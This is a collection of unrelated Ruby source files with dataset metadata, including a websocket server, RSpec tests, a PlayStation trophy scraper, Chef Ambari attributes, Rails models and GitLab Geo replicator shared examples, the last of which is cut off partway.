288d2ca78f1ee609d579862531c028076ea9d444 | 1,658 | # Copyright 2011 Marek Jelen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Wildcloud
module Websockets
class Server
def initialize(router, address, port)
@router = router
@address = address
@port = port
@bootstrap = ServerBootstrap.new(NioServerSocketChannelFactory.new(Executors.newCachedThreadPool, Executors.newCachedThreadPool))
@bootstrap.pipeline_factory = PipelineFactory.new(@router)
end
def start
puts "Starting at #{@address} and #{@port}"
@bootstrap.bind(InetSocketAddress.new(@address, @port))
end
end
class PipelineFactory
include ChannelPipelineFactory
def initialize(router)
@router = router
end
def getPipeline
pipeline = Channels.pipeline
pipeline.add_last('decoder', HttpRequestDecoder.new)
pipeline.add_last('aggregator', HttpChunkAggregator.new(130 * 1024))
pipeline.add_last('encoder', HttpResponseEncoder.new)
pipeline.add_last('preflight', PreflightHandler.new)
pipeline.add_last('handler', @router)
pipeline
end
end
end
end | 29.607143 | 137 | 0.697226 |
f734609ca3fb1b93ffb60941c4f16e3641439962 | 6,444 | # encoding: utf-8
require File.join(File.dirname(__FILE__), 'spec_helper')
describe FixedWidth::Section do
before(:each) do
@section = FixedWidth::Section.new(:body)
end
it "should have no columns after creation" do
@section.columns.should be_empty
end
describe "when adding columns" do
it "should build an ordered column list" do
@section.should have(0).columns
col1 = @section.column :id, 10
col2 = @section.column :name, 30
col3 = @section.column :state, 2
@section.should have(3).columns
@section.columns[0].should be(col1)
@section.columns[1].should be(col2)
@section.columns[2].should be(col3)
end
it "should create spacer columns" do
@section.should have(0).columns
@section.spacer(5)
@section.should have(1).columns
end
it "can should override the alignment of the definition" do
section = FixedWidth::Section.new('name', :align => :left)
section.options[:align].should == :left
end
it "should use a missing method to create a column" do
@section.should have(0).columns
@section.first_name 5
@section.should have(1).columns
end
it "should prevent duplicate column names without any groupings" do
@section.column :id, 10
lambda { @section.column(:id, 30) }.should raise_error(FixedWidth::DuplicateColumnNameError, /column named 'id'/)
end
it "should prevent column names that already exist as groups" do
@section.column :foo, 11, :group => :id
lambda { @section.column(:id, 30) }.should raise_error(FixedWidth::DuplicateGroupNameError, /group named 'id'/)
end
it "should prevent group names that already exist as columns" do
@section.column :foo, 11
lambda { @section.column(:id, 30, :group => :foo) }.should raise_error(FixedWidth::DuplicateGroupNameError, /column named 'foo'/)
end
it "should prevent duplicate column names within groups" do
@section.column :id, 10, :group => :foo
lambda { @section.column(:id, 30, :group => :foo) }.should raise_error(FixedWidth::DuplicateColumnNameError, /column named 'id' in the ':foo' group/)
end
it "should allow duplicate column names in different groups" do
@section.column :id, 10, :group => :foo
lambda { @section.column(:id, 30, :group => :bar) }.should_not raise_error(FixedWidth::DuplicateColumnNameError)
end
it "should allow duplicate column names that are reserved (i.e. spacer)" do
@section.spacer 10
lambda { @section.spacer 10 }.should_not raise_error(FixedWidth::DuplicateColumnNameError)
end
end
it "should accept and store the trap as a block" do
@section.trap { |v| v == 4 }
trap = @section.instance_variable_get(:@trap)
trap.should be_a(Proc)
trap.call(4).should == true
end
describe "when adding a template" do
before(:each) do
@template = mock('templated section', :columns => [1,2,3], :options => {})
@definition = mock("definition", :templates => { :test => @template } )
@section.definition = @definition
end
it "should ensure the template exists" do
@definition.stub! :templates => {}
lambda { @section.template(:none) }.should raise_error(ArgumentError)
end
it "should add the template columns to the current column list" do
@section.template :test
@section.should have(3).columns
end
it "should merge the template option" do
@section = FixedWidth::Section.new(:body, :align => :left)
@section.definition = @definition
@template.stub! :options => {:align => :right}
@section.template :test
@section.options.should == {:align => :left}
end
end
describe "when formatting a row" do
before(:each) do
@data = { :id => 3, :name => "Ryan" }
end
it "should default to string data aligned right" do
@section.column(:id, 5)
@section.column(:name, 10)
@section.format( @data ).should == " 3 Ryan"
end
it "should left align if asked" do
@section.column(:id, 5)
@section.column(:name, 10, :align => :left)
@section.format(@data).should == " 3Ryan "
end
it "should read from groups" do
@data = { :id => 3, :foo => { :name => "Ryan" } }
@section.column(:id, 5)
@section.column(:name, 10, :align => :left, :group => :foo)
@section.format(@data).should == " 3Ryan "
end
end
describe "when parsing a file" do
before(:each) do
@line = ' 45 Ryan WoódSC '
@section = FixedWidth::Section.new(:body)
@column_content = { :id => 5, :first => 10, :last => 10, :state => 2 }
end
it "should return a key for key column" do
@column_content.each { |k,v| @section.column(k, v) }
parsed = @section.parse(@line)
@column_content.each_key { |name| parsed.should have_key(name) }
end
it "should not return a key for reserved names" do
@column_content.each { |k,v| @section.column(k, v) }
@section.spacer 5
@section.should have(5).columns
parsed = @section.parse(@line)
parsed.should have(4).keys
end
it "should break columns into groups" do
@section.column(:id, 5)
@section.column(:first, 10, :group => :name)
@section.column(:last, 10, :group => :name)
@section.column(:state, 2, :group => :address)
@section.spacer 5
@section.should have(5).columns
parsed = @section.parse(@line)
parsed.should have(3).keys
parsed[:id].should == '45'
parsed[:name][:first].should == 'Ryan'
parsed[:name][:last].should == 'Woód'
parsed[:address][:state].should == 'SC'
end
it "should not die if a field is not in range" do
@section.column(:a, 5)
@section.column(:b, 5)
@section.column(:c, 5)
line = ' 45'
parsed = @section.parse(line)
parsed[:a].should == '45'
parsed[:b].should == ''
parsed[:c].should == ''
end
end
it "should try to match a line using the trap" do
@section.trap do |line|
line == 'hello'
end
@section.match('hello').should be_true
@section.match('goodbye').should be_false
end
end
| 34.095238 | 156 | 0.604904 |
0839752c91f002510d01746f6b0578c297e3d670 | 2,270 | require "nokogiri"
require "net/http"
require "uri"
module PsnTrophies
class NoUserProfileError < StandardError; end
class Client
def trophies(profile_id)
check_profile_id(profile_id)
body = get_body("http://us.playstation.com/playstation/psn/profile/#{profile_id}/get_ordered_trophies_data",
"http://us.playstation.com/publictrophy/index.htm?onlinename=#{profile_id}/trophies")
games = []
doc = Nokogiri::HTML.fragment(body)
doc.css('.slotcontent').each do |container|
logo = container.at_css('.titlelogo img')["src"]
title = container.at_css('.gameTitleSortField').content
progress = container.at_css('.gameProgressSortField').content
trophies = container.at_css('.gameTrophyCountSortField').content.strip
games << PlayedGame.new(:image_url => logo, :title => title, :progress => progress, :trophy_count => trophies)
end
games
end
private
def check_profile_id(profile_id)
body = get_body("http://us.playstation.com/playstation/psn/profiles/#{profile_id}",
"http://us.playstation.com/publictrophy/index.htm?onlinename=#{profile_id}")
doc = Nokogiri::HTML(body)
error_section = doc.at_css('.errorSection')
unless error_section.nil?
raise NoUserProfileError.new("No User Profile for #{profile_id}")
end
end
def get_body(uri, referer)
uri = URI.parse(uri)
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
request["Host"] = "us.playstation.com"
request["User-Agent"] = "Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
request["Accept-Language"] = "en-us,en;q=0.5"
request["Accept-Charset"] = "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
request["Connection"] = "keep-alive"
request["Referer"] = referer
response = http.request(request)
response.body
end
end
class PlayedGame
attr_accessor :image_url, :title, :progress, :trophy_count
def initialize(attrs = {})
attrs.each { |attr, value| self.send(:"#{attr}=", value) }
end
end
end
| 32.898551 | 118 | 0.64978 |
26352e993516b275bd86362ec8ff392b3a431775 | 5,206 | #
# Cookbook :: ambari
# Attribute :: default
# Copyright 2018, Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# APT repository attributes
default['apt']['compile_time_update'] = 'true'
default['ambari']['repo_key'] = 'hortonworks.key' # 'B9733A7A07513CAD'
node.default['ambari']['ambari_server_version'] = '2.6.1.5'
node.default['ambari']['platform_major_version'] = "#{node['platform']}#{node['platform_version'].split('.')[0]}"
node.default['ambari']['ambari_ubuntu_repo_url'] = "http://public-repo-1.hortonworks.com/ambari/#{node['ambari']['platform_major_version']}/2.x/updates/#{node['ambari']['ambari_server_version']}"
# Ambari properties
node.default['ambari']['ambari-server-startup-web-timeout'] = '150'
node.default['ambari']['ambari_server_host'] = 'servername.ambari.apache.org'
node.default['ambari']['ambari_server_conf_dir'] = '/etc/ambari-server/conf/'
node.default['ambari']['ambari_agent_conf_dir'] = '/etc/ambari-agent/conf/'
# node.default['ambari']['java_home'] = "/usr/lib/jvm/java-#{node[:java][:jdk_version]}-#{node[:java][:install_flavor]}-amd64"
node.default['ambari']['java_home'] = "/usr/lib/jvm/java-8-oracle-amd64"
node.default['ambari']['use_local_repo'] = 'false'
node.default['ambari']['ambari_server_base_url'] = 'http://localhost:8080'
node.default['ambari']['ambari_views_url'] = "#{node['ambari']['ambari_server_base_url']}/api/v1/views"
node.default['ambari']['admin']['user'] = 'admin'
node.default['ambari']['admin']['password'] = 'admin'
node.default['ambari']['kerberos']['enabled'] = false
node.default['ambari']['kerberos']['principal'] = 'ambari@EXAMPLE.COM'
node.default['ambari']['kerberos']['keytab']['location'] = '/etc/security/keytabs/ambari.service.keytab'
#Ambari internal postgres database attributes
node.default['ambari']['pg_db_script_path'] = '/var/lib/ambari-server/resources/Ambari-DDL-Postgres-EMBEDDED-CREATE.sql'
node.default['ambari']['pg_schema_path'] = '/var/lib/ambari-server/resources/Ambari-DDL-Postgres-CREATE.sql'
# Ambari External Database attributes
node.default['ambari']['embeddeddbhost'] = 'localhost'
node.default['ambari']['db_type'] = 'embedded'
node.default['ambari']['databaseport'] = '3306'
node.default['ambari']['databasehost'] = ['localhost']
node.default['ambari']['databasename'] = 'ambari'
node.default['ambari']['databaseusername'] = 'ambari'
node.default['ambari']['databasepassword'] = 'bigdata'
# FILES view attributes
node.default['ambari']['files_path'] = "FILES/versions/1.0.0/instances/FILES_NEW_INSTANCE"
node.default['ambari']['webhdfs.client.failover.proxy.provider'] = 'org.apache.hadoop.hdfs.server.namenode.ha.ConfiguredFailoverProxyProvider'
node.default['ambari']['webhdfs.ha.namenode.http-address.nn1'] = 'namenode1:50070'
node.default['ambari']['webhdfs.ha.namenode.http-address.nn2'] = 'namenode2:50070'
node.default['ambari']['webhdfs.ha.namenode.https-address.nn1'] = 'namenode1:50470'
node.default['ambari']['webhdfs.ha.namenode.https-address.nn2'] = 'namenode2:50470'
node.default['ambari']['webhdfs.ha.namenode.rpc-address.nn1'] = 'namenode1:8020'
node.default['ambari']['webhdfs.ha.namenode.rpc-address.nn2'] = 'namenode2:8020'
node.default['ambari']['webhdfs.ha.namenodes.list'] = 'nn1,nn2'
node.default['ambari']['webhdfs.nameservices'] = 'hacluster'
node.default['ambari']['webhdfs.url'] = 'webhdfs://hacluster'
node.default['ambari']['webhdfs.auth'] = 'auth=SIMPLE'
# Hive View Attributes
node.default['ambari']['hive20_view_path'] = 'HIVE/versions/2.0.0/instances/HIVE_NEW_INSTANCE'
node.default['ambari']['hive.jdbc.url'] = 'jdbc:hive2://127.0.0.1:10000'
node.default['ambari']['yarn.ats.url'] = 'http://localhost:8188'
node.default['ambari']['yarn.resourcemanager.url'] = 'http://localhost:8088'
node.default['ambari']['hive20_proxy_user'] = 'hive.server2.proxy.user=${username}'
#WorkflowManager_view Attributes
node.default['ambari']['oozie.service.uri'] = 'http://localhost:11000/oozie'
node.default['ambari']['hadoop.security.authentication'] = 'simple'
node.default['ambari']['wfmanager_view_path'] = 'WORKFLOW_MANAGER/versions/1.0.0/instances/WFM_NEW_INSTANCE'
node.default['ambari']['yarn.resourcemanager.address'] = 'http://localhost:8032'
#Tez views
node.default['ambari']['tez_view_path'] = 'TEZ/versions/0.7.0.2.6.4.0-91/instances/TEZ_NEW_INSTANCE'
node.default['ambari']['timeline.http.auth.type'] = 'simple'
node.default['ambari']['hadoop.http.auth.type'] = 'simple'
# Ambari Views Attributes
node.default['ambari']['webhcat.hostname'] = 'u1203.ambari.apache.org'
node.default['ambari']['webhcat.port'] = '50111'
| 51.039216 | 195 | 0.733577 |
7ad7f89ba731f3197897a72d036233d103f6c9de | 482 | class OgcFilterProvider
@@ADDITIONAL_QUERYABLE_NAME = "Provider"
# ProviderId is not an ISO queryable; it is captured into AdditionalQueryables
@@CMR_PROVIDER_ID_PARAM = ADDITIONAL_QUERYABLES_TO_CMR_QUERYABLES[@@ADDITIONAL_QUERYABLE_NAME][1]
def process(ogc_filter)
# the provider_id CMR param supports a wildcard
cmr_query_hash = OgcFilterHelper.process_queryable(ogc_filter, @@ADDITIONAL_QUERYABLE_NAME, @@CMR_PROVIDER_ID_PARAM, true)
cmr_query_hash
end
end | 40.166667 | 126 | 0.809129 |
f83dd146b973af423f3e1fee6f29965b02877d16 | 5,205 | # Copyright 2018 Operation Paws for Homes
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# == Schema Information
#
# Table name: campaigns
#
# id :bigint not null, primary key
# title :string
# goal :integer
# summary :text
# created_by_user_id :integer
# description :text
# primary_photo_file_name :string
# primary_photo_content_type :string
# primary_photo_file_size :integer
# primary_photo_updated_at :datetime
# left_photo_file_name :string
# left_photo_content_type :string
# left_photo_file_size :integer
# left_photo_updated_at :datetime
# middle_photo_file_name :string
# middle_photo_content_type :string
# middle_photo_file_size :integer
# middle_photo_updated_at :datetime
# right_photo_file_name :string
# right_photo_content_type :string
# right_photo_file_size :integer
# right_photo_updated_at :datetime
# created_at :datetime not null
# updated_at :datetime not null
# active :boolean default(TRUE)
class Campaign < ApplicationRecord
include ClientValidated
attr_accessor :primary_photo_delete,
:left_photo_delete,
:middle_photo_delete,
:right_photo_delete
before_save :delete_photo!
ATTACHMENT_MAX_SIZE = 5
CONTENT_TYPES = {"Images" => ['image/jpg', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png', 'image/gif']}.freeze
MIME_TYPES = CONTENT_TYPES.values.flatten
VALIDATION_ERROR_MESSAGES = { primary_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }],
left_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }],
middle_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }],
right_photo: ["image_constraints", { max_size: ATTACHMENT_MAX_SIZE }] }.freeze
validates_presence_of :title,
:goal,
:description
has_many :donations, dependent: :restrict_with_error
scope :active, -> { where(active: true) }
scope :inactive, -> { where(active: false) }
has_attached_file :primary_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: '200x200' },
path: ':rails_root/public/system/campaign_photos/:id/primary/:style/:filename',
url: '/system/campaign_photos/:id/primary/:style/:filename'
validates_attachment_size :primary_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :primary_photo, content_type: MIME_TYPES
has_attached_file :left_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: 'x200' },
path: ':rails_root/public/system/campaign_photos/:id/left/:style/:filename',
url: '/system/campaign_photos/:id/left/:style/:filename'
validates_attachment_size :left_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :left_photo, content_type: MIME_TYPES
has_attached_file :middle_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: 'x200' },
path: ':rails_root/public/system/campaign_photos/:id/middle/:style/:filename',
url: '/system/campaign_photos/:id/middle/:style/:filename'
validates_attachment_size :middle_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :middle_photo, content_type: MIME_TYPES
has_attached_file :right_photo,
styles: { medium: '800x800>',
small: '400x400',
thumb: 'x200' },
path: ':rails_root/public/system/campaign_photos/:id/right/:style/:filename',
url: '/system/campaign_photos/:id/right/:style/:filename'
validates_attachment_size :right_photo, less_than: ATTACHMENT_MAX_SIZE.megabytes
validates_attachment_content_type :right_photo, content_type: MIME_TYPES
def progress
donations.sum(:amount)
end
private
def delete_photo!
primary_photo.clear if primary_photo_delete == '1'
left_photo.clear if left_photo_delete == '1'
middle_photo.clear if middle_photo_delete == '1'
right_photo.clear if right_photo_delete == '1'
end
end
| 41.64 | 122 | 0.631508 |
edd909495c2344c4c8f74299e3c8fb37e25e4604 | 709 | # frozen_string_literal: true
# Detect sites using Cloudflare Polish and bypass it by adding a random
# cache-busting URL param.
#
# @see https://support.cloudflare.com/hc/en-us/articles/360000607372-Using-Cloudflare-Polish-to-compress-images
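#
# Illustrative use via http.rb's feature registration (how the surrounding
# client class actually enables it is not shown here, so treat this as an
# assumed sketch with a placeholder URL):
#
#   HTTP.use(:unpolish_cloudflare).get("https://example.com/sample.jpg")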
module Danbooru
class Http
class UnpolishCloudflare < HTTP::Feature
HTTP::Options.register_feature :unpolish_cloudflare, self
def perform(request, &block)
response = yield request
if response.headers["CF-Polished"].present?
request.uri.query_values = request.uri.query_values.to_h.merge(danbooru_no_polish: SecureRandom.uuid)
response = yield request
end
response
end
end
end
end
| 28.36 | 111 | 0.715092 |
ac728ae2323af900faa384cc3a0fe9c96f9b7c85 | 607 | require 'spec_helper'
describe ApplicationHelper do
describe :markup_to_html do
it "should convert markdown into html" do
markdown = <<EOS
* Foo
* Bar
* Baz
EOS
content = helper.markup_to_html(markdown)
content.should have_selector("li", :count => 3)
end
end
describe :path_to_issue do
it "should delegate to main_app.issue_path" do
issue = FactoryGirl.build_stubbed(:issue)
issue.stub(:number).and_return(1)
helper.path_to_issue(issue).should == issue_path(:user => issue.project.user.username, :key => issue.project.key, :id => 1)
end
end
end
| 25.291667 | 129 | 0.69028 |
391ab0d4371b295d56d8ffeb4f1927603d4dee63 | 247 | class AddDefaultsToProjectContent < ActiveRecord::Migration
def change
%i(title description introduction science_case result faq education_content).each do |column|
change_column_default :project_contents, column, ""
end
end
end
| 30.875 | 97 | 0.781377 |
5dd666bd8dae37d5e2fa207554c2a85972b479d6 | 41 | module Emailable
VERSION = '3.0.1'
end
| 10.25 | 19 | 0.682927 |
7a43e21699014d71c931214606627823948e5bf8 | 1,176 | require "spec_helper"
feature "rails application" do
before { Capybara.app = TestRailsApp::Application }
scenario 'block legal request issued by yundun' do
page.driver.header('User-Agent', ' Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;Alibaba.Security.Heimdall.950384.p')
visit '/posts'
expect(page.status_code).to eq 406
end
scenario 'block illegal request issued by yundun' do
page.driver.header('User-Agent', ' Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;Alibaba.Security.Heimdall.950384.p')
visit '/url_not_exists'
expect(page.status_code).to eq 406
end
scenario 'normal request should be fine' do
page.driver.header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36')
visit '/posts'
expect(page.status_code).to eq 200
end
scenario 'illegal request should throw 404' do
page.driver.header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36')
visit '/url_not_exists'
expect(page.status_code).to eq 404
end
end | 31.783784 | 161 | 0.716837 |
5d6c16da71522d3487e172de38d0a8f077f67d55 | 5,338 | class Asset < ActiveRecord::Base
# used for extra mime types that don't follow the convention
@@image_content_types = ['image/jpeg', 'image/pjpeg', 'image/gif', 'image/png', 'image/x-png', 'image/jpg']
@@extra_content_types = { :audio => ['application/ogg'], :movie => ['application/x-shockwave-flash'], :pdf => ['application/pdf'] }.freeze
cattr_reader :extra_content_types, :image_content_types
# use #send due to a ruby 1.8.2 issue
@@image_condition = send(:sanitize_sql, ['asset_content_type IN (?)', image_content_types]).freeze
@@movie_condition = send(:sanitize_sql, ['asset_content_type LIKE ? OR asset_content_type IN (?)', 'video%', extra_content_types[:movie]]).freeze
@@audio_condition = send(:sanitize_sql, ['asset_content_type LIKE ? OR asset_content_type IN (?)', 'audio%', extra_content_types[:audio]]).freeze
@@other_condition = send(:sanitize_sql, [
'asset_content_type NOT LIKE ? AND asset_content_type NOT LIKE ? AND asset_content_type NOT IN (?)',
'audio%', 'video%', (extra_content_types[:movie] + extra_content_types[:audio] + image_content_types)]).freeze
cattr_reader *%w(movie audio image other).collect! { |t| "#{t}_condition".to_sym }
class << self
def image?(asset_content_type)
image_content_types.include?(asset_content_type)
end
def movie?(asset_content_type)
asset_content_type.to_s =~ /^video/ || extra_content_types[:movie].include?(asset_content_type)
end
def audio?(asset_content_type)
asset_content_type.to_s =~ /^audio/ || extra_content_types[:audio].include?(asset_content_type)
end
def other?(asset_content_type)
![:image, :movie, :audio].any? { |a| send("#{a}?", asset_content_type) }
end
def pdf?(asset_content_type)
extra_content_types[:pdf].include? asset_content_type
end
def find_all_by_content_types(types, *args)
with_content_types(types) { find *args }
end
def with_content_types(types, &block)
with_scope(:find => { :conditions => types_to_conditions(types).join(' OR ') }, &block)
end
def types_to_conditions(types)
types.collect! { |t| '(' + send("#{t}_condition") + ')' }
end
end
order_by 'title'
if Radiant::Config["assets.additional_thumbnails"]
thumbnails = Radiant::Config["assets.additional_thumbnails"].split(', ').collect{|s| s.split('=')}.inject({}) {|ha, (k, v)| ha[k.to_sym] = v; ha}
else
thumbnails = {}
end
thumbnails[:icon] = ['42x42#', :png]
thumbnails[:thumbnail] = '100x100>'
has_attached_file :asset,
:styles => thumbnails,
:whiny_thumbnails => false,
:url => "/:class/:id/:basename:no_original_style.:extension",
:path => ":rails_root/public/:class/:id/:basename:no_original_style.:extension"
has_many :page_attachments, :dependent => :destroy
has_many :pages, :through => :page_attachments
belongs_to :created_by, :class_name => 'User'
belongs_to :updated_by, :class_name => 'User'
validates_attachment_presence :asset, :message => "You must choose a file to upload!"
validates_attachment_content_type :asset,
:content_type => Radiant::Config["assets.content_types"].split(', ') if Radiant::Config["assets.content_types"]
validates_attachment_size :asset,
:less_than => Radiant::Config["assets.max_asset_size"].to_i.megabytes if Radiant::Config["assets.max_asset_size"]
before_save :assign_title
def thumbnail(size = nil)
if size == 'original' or size.nil?
self.asset.url
else
if self.pdf?
"/images/assets/pdf_#{size.to_s}.png"
elsif self.movie?
"/images/assets/movie_#{size.to_s}.png"
elsif self.audio?
"/images/assets/audio_#{size.to_s}.png"
elsif self.other?
"/images/assets/doc_#{size.to_s}.png"
else
self.asset.url(size.to_sym)
end
end
end
def generate_thumbnail(name, args)
path = File.join(RAILS_ROOT, 'public', self.asset(:original))
self.asset do
path = File.join(RAILS_ROOT, 'public', self.asset(:original))
begin
dimensions, format = args
dimensions = dimensions.call(instance) if dimensions.respond_to? :call
@queued_for_write[name] = Paperclip::Thumbnail.make(File.new(path),
dimensions,
format,
@whiny_thumbnails)
rescue PaperclipError => e
@errors << e.message if @whiny_thumbnails
end
attachment.save
end
end
def basename
File.basename(asset_file_name, ".*") if asset_file_name
end
def extension
asset_file_name.split('.').last.downcase if asset_file_name
end
[:movie, :audio, :image, :other, :pdf].each do |content|
define_method("#{content}?") { self.class.send("#{content}?", asset_content_type) }
end
private
def assign_title
self.title = basename if title.blank?
end
def additional_thumbnails
Radiant::Config["assets.additional_thumbnails"].split(',').collect{|s| s.split('=')}.inject({}) {|ha, (k.to_sym, v)| ha[k] = v; ha}
end
end
| 36.813793 | 149 | 0.633945 |
bbaf8d74b6d01b7476babe5766b9ca752ecf241e | 105 | module Trade
Entity = Struct.new(:cost, :price) do
def volume
cost / price
end
end
end
| 13.125 | 39 | 0.609524 |
bb1a40409dbb0ffec461611ea0466b5512d15e39 | 147 | class AddCurrencyToPaymentTransactions < ActiveRecord::Migration
def change
add_column :payment_transactions, :currency, :integer
end
end
| 21 | 64 | 0.802721 |
ede8ff5603d0b1517598ed191f23de91e24d8da5 | 79 | class User < ActiveRecord::Base
has_secure_password
has_many :players
end
| 13.166667 | 31 | 0.78481 |
b91da6f3ead127e69643d9dae87c679e9e838f94 | 17,354 | # frozen_string_literal: true
# This should be included on any Replicator which implements verification.
#
# Expected let variables:
#
# - primary
# - secondary
# - model_record
# - replicator
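#
# Illustrative inclusion in a replicator spec (a sketch; the describe target,
# factory name, and let bodies below are placeholders, not taken from this file):
#
#   RSpec.describe Geo::SomeBlobReplicator, :geo do
#     let(:model_record) { build(:some_blob) }
#     let(:replicator)   { model_record.replicator }
#
#     include_examples 'a verifiable replicator'
#   end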
#
RSpec.shared_examples 'a verifiable replicator' do
include EE::GeoHelpers
describe 'events' do
it 'has checksum_succeeded event' do
expect(described_class.supported_events).to include(:checksum_succeeded)
end
end
describe '.verification_enabled?' do
context 'when replication is enabled' do
before do
expect(described_class).to receive(:enabled?).and_return(true)
end
context 'when verification_feature_flag_enabled? returns true' do
it 'returns true' do
allow(described_class).to receive(:verification_feature_flag_enabled?).and_return(true)
expect(described_class.verification_enabled?).to be_truthy
end
end
context 'when verification_feature_flag_enabled? returns false' do
it 'returns false' do
allow(described_class).to receive(:verification_feature_flag_enabled?).and_return(false)
expect(described_class.verification_enabled?).to be_falsey
end
end
end
context 'when replication is disabled' do
before do
expect(described_class).to receive(:enabled?).and_return(false)
end
it 'returns false' do
expect(described_class.verification_enabled?).to be_falsey
end
end
end
describe '.checksummed_count' do
context 'when verification is enabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(true)
end
it 'returns the number of available verifiables where verification succeeded' do
model_record.verification_started
model_record.verification_succeeded_with_checksum!('some checksum', Time.current)
expect(described_class.checksummed_count).to eq(1)
end
it 'excludes non-success verification states' do
model_record.verification_started!
expect(described_class.checksummed_count).to eq(0)
model_record.verification_failed_with_message!('some error message')
expect(described_class.checksummed_count).to eq(0)
model_record.verification_pending!
expect(described_class.checksummed_count).to eq(0)
end
end
context 'when verification is disabled' do
it 'returns nil' do
allow(described_class).to receive(:verification_enabled?).and_return(false)
expect(described_class.checksummed_count).to be_nil
end
end
end
describe '.checksum_failed_count' do
context 'when verification is enabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(true)
end
it 'returns the number of available verifiables where verification failed' do
model_record.verification_started!
model_record.verification_failed_with_message!('some error message')
expect(described_class.checksum_failed_count).to eq(1)
end
it 'excludes other verification states' do
model_record.verification_started!
expect(described_class.checksum_failed_count).to eq(0)
model_record.verification_succeeded_with_checksum!('foo', Time.current)
expect(described_class.checksum_failed_count).to eq(0)
model_record.verification_pending!
expect(described_class.checksum_failed_count).to eq(0)
end
end
context 'when verification is disabled' do
it 'returns nil' do
allow(described_class).to receive(:verification_enabled?).and_return(false)
expect(described_class.checksum_failed_count).to be_nil
end
end
end
describe '.trigger_background_verification' do
context 'when verification is enabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(true)
end
it 'enqueues VerificationBatchWorker' do
expect(::Geo::VerificationBatchWorker).to receive(:perform_with_capacity).with(described_class.replicable_name)
described_class.trigger_background_verification
end
it 'enqueues VerificationTimeoutWorker' do
expect(::Geo::VerificationTimeoutWorker).to receive(:perform_async).with(described_class.replicable_name)
described_class.trigger_background_verification
end
context 'for a Geo secondary' do
it 'does not enqueue ReverificationBatchWorker' do
stub_secondary_node
expect(::Geo::ReverificationBatchWorker).not_to receive(:perform_async)
described_class.trigger_background_verification
end
end
context 'for a Geo primary' do
it 'enqueues ReverificationBatchWorker' do
stub_primary_node
expect(::Geo::ReverificationBatchWorker).to receive(:perform_async).with(described_class.replicable_name)
described_class.trigger_background_verification
end
end
end
context 'when verification is disabled' do
before do
allow(described_class).to receive(:verification_enabled?).and_return(false)
end
it 'does not enqueue VerificationBatchWorker' do
expect(::Geo::VerificationBatchWorker).not_to receive(:perform_with_capacity)
described_class.trigger_background_verification
end
it 'does not enqueue VerificationTimeoutWorker' do
expect(::Geo::VerificationTimeoutWorker).not_to receive(:perform_async)
described_class.trigger_background_verification
end
end
end
describe '.verify_batch' do
context 'when there are records needing verification' do
let(:another_replicator) { double('another_replicator', verify: true) }
let(:replicators) { [replicator, another_replicator] }
before do
allow(described_class).to receive(:replicator_batch_to_verify).and_return(replicators)
end
it 'calls #verify on each replicator' do
expect(replicator).to receive(:verify)
expect(another_replicator).to receive(:verify)
described_class.verify_batch
end
end
end
describe '.remaining_verification_batch_count' do
it 'converts needs_verification_count to number of batches' do
expected_limit = 40
expect(described_class).to receive(:needs_verification_count).with(limit: expected_limit).and_return(21)
expect(described_class.remaining_verification_batch_count(max_batch_count: 4)).to eq(3)
end
end
describe '.remaining_reverification_batch_count' do
it 'converts needs_reverification_count to number of batches' do
expected_limit = 4000
expect(described_class).to receive(:needs_reverification_count).with(limit: expected_limit).and_return(1500)
expect(described_class.remaining_reverification_batch_count(max_batch_count: 4)).to eq(2)
end
end
describe '.reverify_batch!' do
it 'calls #reverify_batch' do
allow(described_class).to receive(:reverify_batch).with(batch_size: described_class::DEFAULT_REVERIFICATION_BATCH_SIZE)
described_class.reverify_batch!
end
end
describe '.replicator_batch_to_verify' do
it 'returns usable Replicator instances' do
model_record.save!
expect(described_class).to receive(:model_record_id_batch_to_verify).and_return([model_record.id])
first_result = described_class.replicator_batch_to_verify.first
expect(first_result.class).to eq(described_class)
expect(first_result.model_record_id).to eq(model_record.id)
end
end
